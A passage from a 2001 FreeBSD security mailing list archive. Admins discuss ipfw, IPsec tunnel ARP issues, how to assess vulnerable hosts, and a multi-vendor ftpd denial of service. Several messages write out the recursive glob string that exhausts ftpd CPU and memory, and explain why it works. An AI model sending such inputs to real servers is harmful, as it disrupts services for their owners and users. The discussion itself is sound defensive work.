3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 15:15:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 551A037B718 for ; Thu, 15 Mar 2001 15:15:27 -0800 (PST) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id AAA62716; Fri, 16 Mar 2001 00:15:14 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Rodney W. Grimes" Cc: nate@yogotech.com (Nate Williams), adam@algroup.co.uk (Adam Laurie), ronan@melim.com.br (Ronan Lucio), security@FreeBSD.ORG Subject: Re: Port 113 References: <200103152258.OAA51686@gndrsh.dnsmgr.net> From: Dag-Erling Smorgrav Date: 16 Mar 2001 00:15:13 +0100 In-Reply-To: "Rodney W. Grimes"'s message of "Thu, 15 Mar 2001 14:58:00 -0800 (PST)" Message-ID: Lines: 12 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rodney W. Grimes" writes: > IIRC one of the problems I saw was that the icmp reset packet was > created with the address of the ipfw box, which caused it to be > ignored by the sending host. Don't know if that ever got fixed or > not though. Uh, you're probably right. I mostly run ipfw on the leaf host, so I wouldn't get hit by that bug. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 15:17: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from www3.infolink.com.br (www3.infolink.com.br [200.255.108.4]) by hub.freebsd.org (Postfix) with ESMTP id 68E5B37B719 for ; Thu, 15 Mar 2001 15:17:02 -0800 (PST) (envelope-from apina@infolink.com.br) Received: from infolink.com.br (unverified [200.255.108.32]) by www3.infolink.com.br (Vircom SMTPRS 4.2.181) with SMTP id for ; Thu, 15 Mar 2001 20:16:59 -0300 From: "Antonio Carlos Pina" Reply-To: apina@infolink.com.br To: freebsd-security@freebsd.org Date: Thu, 15 Mar 2001 20:17:00 est Subject: Re: Multiple vendors FTP denial of service (fwd) Message-id: <3ab14d6c.31f.0@infolink.com.br> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, Actually I think this highly depends on HOW MANY files and directories FTPD can access. I didn't see any damage with a jailed FTPD with 1 directoy and 2 files. Best Regards, >I think so. With 4.2-STABLE in an anonymous session we got 100% CPU >until we kill ftpd. > >> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in >> > -STABLE. >> >> Sure? >> >> With 4.2-REL: >> >> Remote system type is UNIX. >> Using binary mode to transfer files. >> ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* >> 150 Opening ASCII mode data connection for '/bin/ls'. >> 226 Transfer complete. >> ftp> >> ftp> ls >> 150 Opening ASCII mode data connection for '/bin/ls'. >> total 13 >> -rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc >> drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm >> -rw------- 1 fpscha wheel 1517 20 feb 09:28 .history >> -rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login >> >> [Everything normal, I mean] >> >> >> Regards. >> >> Fernando P. Schapachnik >> Administraci=F3n de la red >> VIA NET.WORKS ARGENTINA S.A. >> fschapachnik@vianetworks.com.ar >> Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > >-- > Frederico A C Neves Registro .br - R.Pio XI, 1500 > +55 11 3838-4130 S=E3o Paulo, SP, Brazil - 05468-901 > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > Cordialmente, Antonio Carlos Pina apina@infolink.com.br Diretor de Tecnologia (CTO) http://www.infolink.com.br To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 15:44:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from tahoe.cinenet.net (ns1.cinenet.net [198.147.76.65]) by hub.freebsd.org (Postfix) with ESMTP id D16C837B718 for ; Thu, 15 Mar 2001 15:44:15 -0800 (PST) (envelope-from mikey@singingtree.com) Received: from ember (pool.207.151.148.219.cinenet.net [207.151.148.219]) by tahoe.cinenet.net (8.9.3/8.9.3) with SMTP id PAA08072 for ; Thu, 15 Mar 2001 15:44:14 -0800 (PST) Message-ID: <004b01c0ada9$99f7b540$db9497cf@singingtree.com> From: "Michael A. Dickerson" To: References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> Subject: Re: Multiple vendors FTP denial of service (fwd) Date: Thu, 15 Mar 2001 15:42:29 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > 4.1 from Aug 10th is hurt by it. > > ---Mike > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100% cpu and memory use grows until the kernel runs out of swap space and starts killing processes. This was an ftp connection with a regular username and password, in an average home directory. M.D. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 15:52:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 7CC1D37B718 for ; Thu, 15 Mar 2001 15:52:36 -0800 (PST) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f2FNqYY22370; Thu, 15 Mar 2001 15:52:34 -0800 (PST) Date: Thu, 15 Mar 2001 15:52:34 -0800 From: Alfred Perlstein To: Antonio Carlos Pina Cc: freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <20010315155234.G29888@fw.wintelcom.net> References: <3ab14d6c.31f.0@infolink.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ab14d6c.31f.0@infolink.com.br>; from apina@infolink.com.br on Thu, Mar 15, 2001 at 08:17:00PM -0500 X-all-your-base: are belong to us. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Antonio Carlos Pina [010315 15:17] wrote: > Hello, > > Actually I think this highly depends on HOW MANY files and > directories FTPD can access. > > I didn't see any damage with a jailed FTPD with 1 directoy and 2 > files. The only reason you didn't see a problem was because you had only one directory. The DoS works via a simple mechanism. if you have a dir with two directories in it 'a' and 'b' */../ -> a/.. b/.. */../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/.. basically for each ../*/ you do a power N where N is the number of directories. How could this be fixed? I think it's somewhat simple, have glob() maintain a truncated version of paths and make sure that any collisions are detected. Of course this is only speculation since I haven't looked at the code. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 19:38:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61]) by hub.freebsd.org (Postfix) with ESMTP id 1A30237B727 for ; Thu, 15 Mar 2001 19:38:24 -0800 (PST) (envelope-from jomor@ahpcns.com) Received: from ahpcns.com (localhost [127.0.0.1]) by shorty.ahpcns.com (Postfix) with ESMTP id 041EA3A2DD; Thu, 15 Mar 2001 21:38:20 -0600 (CST) Message-ID: <3AB18AAC.9069CBF2@ahpcns.com> Date: Thu, 15 Mar 2001 21:38:20 -0600 From: jomor Organization: ahpcns X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Mike Burgett Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: IPSEC tunnel without gif? References: <200103150440.f2F4eZB25117@dragon.awen.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mike Burgett wrote: > On Wed, 14 Mar 2001 22:21:30 -0600, jomor wrote: > > >The gateway that received the pings was transmitting ARP > >requests but strangely, it was trying to get the hardware > >address of the other tunnel endpoint rather than that of > >the router in the middle. Since the ARP requests were never > >answered, the ping response was never transmitted. > > This sounds an awful lot like: > > http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21079 > > I added a static arp entry for my router awhile back to work around this > very thing. > > Thanks, > Mike Yup that's it. I got the same thing testing with a straight (no ipsec) gif tunnel too. Are you running this in a "production" environment or just playing with it? Has it proven reliable with the static arp entry? I was pleasantly surprised to find that I didn't have any PMTUD problems today (with ipsec up) like I did with PPTP. Thanks ...jgm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 21:29:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from coconut.itojun.org (coconut.itojun.org [210.160.95.97]) by hub.freebsd.org (Postfix) with ESMTP id 2269937B718 for ; Thu, 15 Mar 2001 21:29:53 -0800 (PST) (envelope-from itojun@itojun.org) Received: from kiwi.itojun.org (localhost.itojun.org [127.0.0.1]) by coconut.itojun.org (8.9.3+3.2W/3.7W) with ESMTP id OAA19429; Fri, 16 Mar 2001 14:29:36 +0900 (JST) To: jomor Cc: Mike Burgett , "freebsd-security@FreeBSD.ORG" In-reply-to: jomor's message of Thu, 15 Mar 2001 21:38:20 CST. <3AB18AAC.9069CBF2@ahpcns.com> X-Template-Reply-To: itojun@itojun.org X-Template-Return-Receipt-To: itojun@itojun.org X-PGP-Fingerprint: F8 24 B4 2C 8C 98 57 FD 90 5F B4 60 79 54 16 E2 Subject: Re: IPSEC tunnel without gif? From: itojun@iijlab.net Date: Fri, 16 Mar 2001 14:29:36 +0900 Message-ID: <19427.984720576@coconut.itojun.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> >The gateway that received the pings was transmitting ARP >> >requests but strangely, it was trying to get the hardware >> >address of the other tunnel endpoint rather than that of >> >the router in the middle. Since the ARP requests were never >> >answered, the ping response was never transmitted. so you are seeing ARP for tunnel inner addresses? http://www.kame.net/dev/cvsweb.cgi/kame/kame/sys/netinet6/ipsec.c.diff?r1=1.84&r2=1.85 should fix the above issue. not sure about freebsd merge status. itojun To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 21:59:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202]) by hub.freebsd.org (Postfix) with ESMTP id A4BA637B718 for ; Thu, 15 Mar 2001 21:59:13 -0800 (PST) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 596A466B09; Thu, 15 Mar 2001 21:59:13 -0800 (PST) Date: Thu, 15 Mar 2001 21:59:13 -0800 From: Kris Kennaway To: "Michael A. Dickerson" Cc: freebsd-security@freebsd.org Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <20010315215913.A70990@mollari.cthul.hu> References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="a8Wt8u1KmwUX3Y2C" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <004b01c0ada9$99f7b540$db9497cf@singingtree.com>; from mikey@singingtree.com on Thu, Mar 15, 2001 at 03:42:29PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --a8Wt8u1KmwUX3Y2C Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote: > > 4.1 from Aug 10th is hurt by it. > > > > ---Mike > > >=20 > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100% > cpu and memory use grows until the kernel runs out of swap space and star= ts > killing processes. This was an ftp connection with a regular username and > password, in an average home directory. I'm pretty sure (but haven't tested) that resource limits will prevent this problem. Your ftpd shouldn't be using large amount of memory under normal operating procedures, so you can set those to reasonable values and not suffer any ill effects. Kris --a8Wt8u1KmwUX3Y2C Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6sauwWry0BWjoQKURAgE4AKCnmhjKbrNZCIMikQJWUftK81880ACeMt5a pb6xBdAHKw1FylymJOF7y3k= =YHjb -----END PGP SIGNATURE----- --a8Wt8u1KmwUX3Y2C-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 22:37:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id A202237B718 for ; Thu, 15 Mar 2001 22:37:40 -0800 (PST) (envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Thu, 15 Mar 2001 22:35:38 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2G6bbD09511; Thu, 15 Mar 2001 22:37:37 -0800 (PST) (envelope-from cjc) Date: Thu, 15 Mar 2001 22:37:36 -0800 From: "Crist J. Clark" To: Kris Kennaway Cc: "Michael A. Dickerson" , freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <20010315223736.C28471@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> <20010315215913.A70990@mollari.cthul.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>; from kris@obsecurity.org on Thu, Mar 15, 2001 at 09:59:13PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Mar 15, 2001 at 09:59:13PM -0800, Kris Kennaway wrote: > On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote: > > > 4.1 from Aug 10th is hurt by it. > > > > > > ---Mike > > > > > > > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100% > > cpu and memory use grows until the kernel runs out of swap space and starts > > killing processes. This was an ftp connection with a regular username and > > password, in an average home directory. > > I'm pretty sure (but haven't tested) that resource limits will prevent > this problem. Your ftpd shouldn't be using large amount of memory > under normal operating procedures, so you can set those to reasonable > values and not suffer any ill effects. And this really does not have a lot directly to do with ftpd. Try, $ ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/ At a command line and watch what the shell does. It's a general globbing issue. Anyway, as for ftpd, all a user can kill the ftpd process they are using provided, as Kris points out, resource limits are set appropriately. The user can do pretty much the same thing by logging out. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 23: 3:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from xocah.holywar.net (xocah.holywar.net [211.232.152.22]) by hub.freebsd.org (Postfix) with SMTP id C02A237B718 for ; Thu, 15 Mar 2001 23:03:18 -0800 (PST) (envelope-from tsoi@xocah.holywar.net) Received: (qmail 11778 invoked by uid 101); 16 Mar 2001 07:03:11 -0000 Date: Fri, 16 Mar 2001 16:03:11 +0900 From: "ho-sang, yoon" To: freebsd-security@freebsd.org Cc: Kris Kennaway Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <20010315215913.A70990@mollari.cthul.hu> Reply-To: tsoi@xocah.holywar.net Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mmmm.. ----------------------------------------------------------------------------- $ uname -a FreeBSD 4.2-STABLE $ whoami ftp $ ulimit -a cpu time (seconds, -t) unlimited file size (512-blocks, -f) unlimited data seg size (kbytes, -d) 524288 stack size (kbytes, -s) 65536 core file size (512-blocks, -c) 102400 max memory size (kbytes, -m) 20480 locked memory (kbytes, -l) 10240 max user processes (-u) 8211 open files (-n) 16424 sbsize (bytes, -b) unlimited ----------------------------------------------------------------------------- ---top----------------------------------------------------------------------- PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND 6379 root 55 0 33360K 33016K RUN 0:40 86.02% 84.67% ftpd [cut] ----------------------------------------------------------------------------- and, have killed the pid in another terminal. I don't think that the resourse limit does effect on this matter. Or, am I something wrong? -- no signature To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 1:25:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from pooh.noc.u-net.net (pooh.noc.u-net.net [195.102.252.112]) by hub.freebsd.org (Postfix) with ESMTP id 9E46B37B71A for ; Fri, 16 Mar 2001 01:25:46 -0800 (PST) (envelope-from peterm@vianetworks.co.uk) Received: from localhost.noc.u-net.net ([127.0.0.1] helo=vianetworks.co.uk) by pooh.noc.u-net.net with esmtp (Exim 3.20 #1) id 14dqTx-000M5H-00 for freebsd-security@FreeBSD.ORG; Fri, 16 Mar 2001 09:25:13 +0000 Message-ID: <3AB1DBF9.C721E3D6@vianetworks.co.uk> Date: Fri, 16 Mar 2001 09:25:13 +0000 From: Peter McGarvey Organization: VIA NETdotWORKS X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security Subject: What's vunerable? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've just inherited several FreeBSD boxes. The versions range from 3.2_RELEASE to 4.1_RELEASE. On the BSD boxes I already maintain I cvsup and make world on a monthly basis - or as soon as I see a CERT advisory that I know relates to something that can bite. But the inherited boxes need a lot of work, and I cannot guarantee to "The Powers That Be" that a make world wont break the box. What I really need to know is what vulnerabilities exist on each box - so that I can present the boss with a risk assessment, and make him decide if the box stays as is, or gets a make world. So any advice anyone can give me, on how to find out what's vunerable with any particular FreeBSD version, would be greatly appreciated. -- TTFN, FNORD Peter McGarvey System Administrator Network Operations, VIA Networks UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 1:34:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from lastebil.math.ntnu.no (lastebil.math.ntnu.no [129.241.211.200]) by hub.freebsd.org (Postfix) with SMTP id BF21937B758 for ; Fri, 16 Mar 2001 01:34:38 -0800 (PST) (envelope-from perchrh@stud.math.ntnu.no) Received: (qmail 28892 invoked by uid 23781); 16 Mar 2001 09:34:41 -0000 Date: Fri, 16 Mar 2001 10:34:41 +0100 (MET) From: Per Christian Henden X-X-Sender: To: Subject: weird error messages (at least I don't understand them) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My daily "security check output" (autogenerated mail sent to root, enabled by default in freebsd) contains a variying number of lines just like this: arp: unknown hardware address format (0x0800) Is this something I should be worried about? These entries (or something similar) also appears fairly frequently (I replaced my real dns-name with "my.hostname.domain") Checking for rejected mail hosts: 5 malvix.hist.no 2 my.hostname.domain 2 malvix.hist.no@my.hostname.domain 1 ; Fri, 16 Mar 2001 01:40:04 -0800 (PST) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 5236166EAE; Fri, 16 Mar 2001 01:40:04 -0800 (PST) Date: Fri, 16 Mar 2001 01:40:04 -0800 From: Kris Kennaway To: Peter McGarvey Cc: freebsd-security Subject: Re: What's vunerable? Message-ID: <20010316014004.A86953@mollari.cthul.hu> References: <3AB1DBF9.C721E3D6@vianetworks.co.uk> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ZGiS0Q5IWpPtfppv" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ZGiS0Q5IWpPtfppv Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Mar 16, 2001 at 09:25:13AM +0000, Peter McGarvey wrote: > I've just inherited several FreeBSD boxes. The versions range from > 3.2_RELEASE to 4.1_RELEASE. >=20 > On the BSD boxes I already maintain I cvsup and make world on a monthly > basis - or as soon as I see a CERT advisory that I know relates to > something that can bite. But the inherited boxes need a lot of work, > and I cannot guarantee to "The Powers That Be" that a make world wont > break the box. >=20 > What I really need to know is what vulnerabilities exist on each box - > so that I can present the boss with a risk assessment, and make him > decide if the box stays as is, or gets a make world. >=20 > So any advice anyone can give me, on how to find out what's vunerable > with any particular FreeBSD version, would be greatly appreciated. Read the advisories. Kris --ZGiS0Q5IWpPtfppv Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6sd9zWry0BWjoQKURAkV/AKDyVoMztBFCT/2lhHFyE7u9M9WQigCgmvNw nu+GOtfOmqeRzeZ7zCkFe/I= =Nghs -----END PGP SIGNATURE----- --ZGiS0Q5IWpPtfppv-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 1:40:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from nevada.btk.za.net (nevada.btk.za.net [213.77.120.30]) by hub.freebsd.org (Postfix) with SMTP id CC61237B71E for ; Fri, 16 Mar 2001 01:40:23 -0800 (PST) (envelope-from freebsd@nevada.btk.za.net) Received: (from freebsd@localhost) by nevada.btk.za.net (8.11.1/8.11.1) id f2GAdsG26666 for freebsd-security@freebsd.org; Fri, 16 Mar 2001 10:39:54 GMT (envelope-from freebsd) Date: Fri, 16 Mar 2001 10:39:54 +0000 From: Lukasz Pawlik To: freebsd-security@freebsd.org Subject: Invalid hostname Message-ID: <20010316103954.A24855@btk.za.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I'd like to ask for a little help. I dont understand one record which is printed by last. ash ttyp2 invalid hostname Ndz 11 Mar 19:07 - 20:13 (01:06) What the 'invalid hostname' is? If DNS failed, why there is no ip? Can someone explain me? Lukasz -- Lukasz Pawlik e-mail:Lukasz.Pawlik@kielce.wox.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 2: 7: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (shady.org [195.153.248.241]) by hub.freebsd.org (Postfix) with SMTP id 3ADB537B719 for ; Fri, 16 Mar 2001 02:07:07 -0800 (PST) (envelope-from marcr@closed-networks.com) Received: (qmail 88671 invoked by uid 1000); 16 Mar 2001 10:10:11 -0000 Date: Fri, 16 Mar 2001 10:10:11 +0000 From: Marc Rogers To: freebsd-security@FreeBSD.ORG Subject: Re: What's vunerable? Message-ID: <20010316101011.U10016@shady.org> References: <3AB1DBF9.C721E3D6@vianetworks.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Point your browser at: http://www.freebsd.org/security/#adv All the info you need is there. My advise to you though is to consider synchronising your boxes. It is far far easier to secure several of the same thing than it is to secure lots of different things. Marc Rogers Head of Network Operations & Security EDC Group To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 2:19:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (shady.org [195.153.248.241]) by hub.freebsd.org (Postfix) with SMTP id 766A137B718 for ; Fri, 16 Mar 2001 02:19:55 -0800 (PST) (envelope-from marcr@closed-networks.com) Received: (qmail 88777 invoked by uid 1000); 16 Mar 2001 10:23:02 -0000 Date: Fri, 16 Mar 2001 10:23:02 +0000 From: Marc Rogers To: freebsd-security@FreeBSD.ORG Subject: Re: What's vunerable? Message-ID: <20010316102302.V10016@shady.org> References: <3AB1DBF9.C721E3D6@vianetworks.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org on the subject of updating a large number of freebsd boxes... I just thought I would throw my twopence worth in, as while working for a number of entirely freebsd based isps a few years ago, I had to deal with exactly this problem. Making world in situ on production servers is a game of russian roulette. Most fo the time it works, but the older the starting version, the harder it becomes. The safest way to synchronise a large number of boxes (in my view) is to play a shell game with them. Take one clean box and install freebsd and whatever base software you need. Then migrate the customer data from one of your older boxes onto this new one. When you are comfortable that the new box can replace the old one completely, shut down the old one and bring up the interfaces on the replacement. Next take the box you just replaced, and after backing everything up, reinstall the os. Use this box to upgrade another. and so on. When you get the hang of it, it becomes quite a swift process. Please ensure that you do back everything up though, as I can guaruntee you will forget something. If you need any futher help, feel free to mail me. Marc Rogers Head of Network Operations & Security EDC Group To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 2:26:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id 9D2BF37B719 for ; Fri, 16 Mar 2001 02:26:14 -0800 (PST) (envelope-from sakane@ydc.co.jp) Received: from localhost ([3ffe:501:481d:1000:260:1dff:fe21:f766]) by mine.kame.net (8.11.1/3.7W) with ESMTP id f2GAR6Y76773; Fri, 16 Mar 2001 19:27:07 +0900 (JST) To: kris@obsecurity.org Cc: freebsd-security@FreeBSD.ORG Subject: Re: What's vunerable? In-Reply-To: Your message of "Fri, 16 Mar 2001 01:40:04 -0800" <20010316014004.A86953@mollari.cthul.hu> References: <20010316014004.A86953@mollari.cthul.hu> X-Mailer: Cue version 0.6 (010224-1625/sakane) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-Id: <20010316192556Q.sakane@ydc.co.jp> Date: Fri, 16 Mar 2001 19:25:56 +0900 From: Shoichi Sakane X-Dispatcher: imput version 20000228(IM140) Lines: 8 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > What I really need to know is what vulnerabilities exist on each box - > > so that I can present the boss with a risk assessment, and make him > > decide if the box stays as is, or gets a make world. > Read the advisories. why don't the maintener of the ports of openssh make upgrade its version ? current version of the ports is openssh 2.2.0 which has some vulnerability. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 3:10:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from daphne.unloved.org (daphne.unloved.org [62.58.62.165]) by hub.freebsd.org (Postfix) with ESMTP id DDD6E37B719 for ; Fri, 16 Mar 2001 03:10:21 -0800 (PST) (envelope-from ashp@unloved.org) Received: by daphne.unloved.org (Postfix, from userid 1001) id AB7D31176B; Fri, 16 Mar 2001 12:11:58 +0100 (CET) Date: Fri, 16 Mar 2001 12:11:58 +0100 From: Ashley Penney To: 